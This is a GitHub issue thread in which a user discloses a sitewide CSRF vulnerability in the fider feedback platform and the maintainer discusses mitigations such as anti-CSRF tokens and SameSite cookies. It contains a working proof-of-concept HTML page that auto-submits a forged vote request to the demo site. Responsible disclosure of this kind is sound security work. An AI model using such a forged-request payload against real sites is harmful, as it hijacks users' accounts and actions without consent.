### ISSUE TITLE
CSRF security issue sitewide

### ISSUE THREAD

**Issue by bauthard** [getfider/fider#835]
Hi, 

Thank you for working and maintaining this awesome open source project, I was looking to use `fider` for one of our upcoming project and decided to check the security of it and found it's vulnerable for sitewide [CSRF](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) vulnerability which allows anyone to perform any actions on behalf of you with simple HTML form.  

As an example, this form will upvote with the post ID `137` on behalf of you. 

```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.fider.io/api/v1/posts/137/votes" method="POST">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

and similar actions are possible for **update email and accounts details** which is pretty much serious. 

You can simply mitigate this issue by adding [Anti CSRF token](https://blog.insiderattack.net/anti-csrf-tokens-to-prevent-cross-site-request-forgery-csrf-79b9d7a5c079) with each request in the header or body. 

Let me know if you have any questions on this.

**Comment by goenning** [comment]
hey @bauthard, thanks for the report.

The UI is a consumer of the API, so adding a CSRF token might be a bit more complicated as we'd have to segregate it into two separate sets of endpoints. Not impossible, but just looking for other options too.

I presume setting the SameSite property of the cookie would also mitigate this. Have you ever tried that?

**Comment by bauthard** [comment]
Make sense, will try this. 

Thank you.
